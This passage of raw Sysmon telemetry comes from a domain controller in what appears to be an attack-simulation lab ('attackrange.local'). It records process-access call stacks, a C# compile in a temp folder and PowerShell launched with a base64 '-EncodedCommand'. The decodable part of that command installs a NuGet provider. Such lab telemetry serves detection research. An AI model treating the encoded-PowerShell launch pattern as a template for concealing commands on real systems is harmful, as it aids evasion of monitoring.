ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003459Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003458Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003457Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003456Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003455Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003454Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CAC-5FA1-A900-000000008801}4364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003453Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7CAB-5FA1-A800-000000008801}50684948C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CAC-5FA1-A900-000000008801}4364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003452Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.033{D28789B6-7CAC-5FA1-A900-000000008801}4364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES338E.tmp" "c:\Users\Administrator\AppData\Local\Temp\r3opyxac\CSC8FA584B47D7447E3B981B11CD8C1B37D.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CAB-5FA1-A800-000000008801}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\r3opyxac\r3opyxac.cmdline" 10341000x80000000000000003609Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.853{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003608Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.853{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003607Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.822{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4p3iw4kq.rdf.ps12020-11-03 15:52:13.822 10341000x80000000000000003606Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.806{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003605Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003604Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003603Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003602Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003601Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003600Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003599Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003598Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003597Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003596Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003595Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003594Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.775{D28789B6-7CAC-5FA1-AE00-000000008801}49883508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF8DC7A8890) 154100x80000000000000003593Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.784{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG4AcwB0AGEAbABsAC0AUABhAGMAawBhAGcAZQBQAHIAbwB2AGkAZABlAHIAIAAtAE4AYQBtAGUAIABOAHUARwBlAHQAIAAtAE0AaQBuAGkAbQB1AG0AVgBlAHIAcwBpAG8AbgAgADIALgA4AC4ANQAuADIAMAAxACAALQBGAG8AcgBjAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 